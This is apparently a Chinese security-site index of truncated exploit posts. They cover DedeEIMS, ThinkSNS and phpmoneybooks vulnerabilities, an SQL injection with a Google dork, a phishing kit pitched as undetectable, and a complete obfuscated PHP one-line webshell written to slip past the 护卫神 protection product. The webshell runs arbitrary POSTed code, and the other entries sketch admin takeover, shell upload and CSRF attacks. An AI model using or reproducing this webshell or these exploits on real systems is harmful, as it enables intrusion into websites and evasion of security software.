技术文章79

DedeEIMS v1.1 暴后台路径【转】

includedialogconfig.php //检验用户登录状态 $cuserLogin = new userLogin(); if($cuserLogin->getUserID()==- ...

Email钓鱼测试工具包—Phemail

Phemail这个安全测试工具包可以获取那些被Email钓鱼方式引诱的浏览器信息,但由于它并不使用任何web浏览器exploit、不包含任何攻击性,所以100%不会被杀毒软件探测。仅用于安全测试,禁止 ...

ThinkSNS后台拿shell漏洞

经过楼主的测试,可以通杀2.0——2.8版本。 未经同意,禁止转载。 程序名称:ThinkSNS 影响版本: 2.0——2.8 漏洞类型: 后台拿shell 漏洞位置: 全局-附件设置 版本确定: 1 ...

Doors web 注入漏洞

# Google dork: [inurl:"indice.php?page_id="] #exploit http://target.com.ar/indice.php?page_id=[sq ...

过护卫神PHP一句话(转)

<?php $a = str_replace(x,”",”axsxxsxexrxxt”); $a($_POST["c"]); ?> ...

phpmoneybooks CSRF Vulnerability (Add Admin)

Exploit: <html> <head> <title>phpmoneybooks [Add Admin]</title> </head&gt ...